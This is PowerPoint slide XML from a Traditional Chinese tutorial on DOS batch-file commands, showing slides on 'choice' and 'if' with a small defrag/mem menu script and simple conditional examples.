              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>choice /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>c:dme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>defrag,mem,end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> defrag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（應先判斷數值最高的錯誤碼）</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> mem</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errotlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> end</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:defrag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>c:\dos\defrag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:mem</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>mem</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo good bye</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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>此文件運行後，將顯示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>defrag,mem,end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[D,M,E]? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>用戶可選擇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>d m e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，然後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語句將作出判斷，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示執行標號為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>defrag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的程序段，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示執行標號為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的程序段，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示執行標號為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的程序段，每個程序段最後都以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將程序跳到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>標號處，然後程序將顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>good by e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，文件結束。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29256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3CB3A-ADD4-4FEA-B961-CFDC11F8E4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C15A5C-09BE-47CD-A5BD-DC4B3189DFAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示將判斷是否符合規定的條件，從而決定執行不同的命令。 有三種格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>\ == \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>　待執行的命令</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數如果等於指定的字符串，則條件成立，運行命令，否則運行下一句。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>注意是兩個等號）</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if \%1\==\a\ format a:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if {%1}=={} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>noparms</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if {%2}=={} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>noparms</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if exist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>文件名　 待執行的命令</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果有指定的文件，則條件成立，運行命令，否則運行下一句。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if exist config.sys edit config.sys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> / if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>數字　 待執行的命令</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果返回碼等於指定的數字，則條件成立，運行命令，否則運行下一句。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> x2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程序運行時都會返回一個數字給</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，稱為錯誤碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>errorlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或稱返回碼，常見的返回碼為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121296528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325</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>36</Paragraphs>
  <Slides>15</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15</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="19" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>Echo 命令</vt:lpstr>
      <vt:lpstr>@ 命令</vt:lpstr>
      <vt:lpstr>Goto 命令</vt:lpstr>
      <vt:lpstr>Rem 命令</vt:lpstr>
      <vt:lpstr>Pause 命令</vt:lpstr>
      <vt:lpstr>Call 命令</vt:lpstr>
      <vt:lpstr>start 命令</vt:lpstr>
      <vt:lpstr>choice 命令</vt:lpstr>
      <vt:lpstr>If 命令</vt:lpstr>
      <vt:lpstr>for 命令</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命令</dc:title>
  <dc:creator>TTS</dc:creator>
  <cp:lastModifiedBy>TTS</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-14T15:12:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-14T15:43:12Z</dcterms:modified>
</cp:coreProperties>
</file>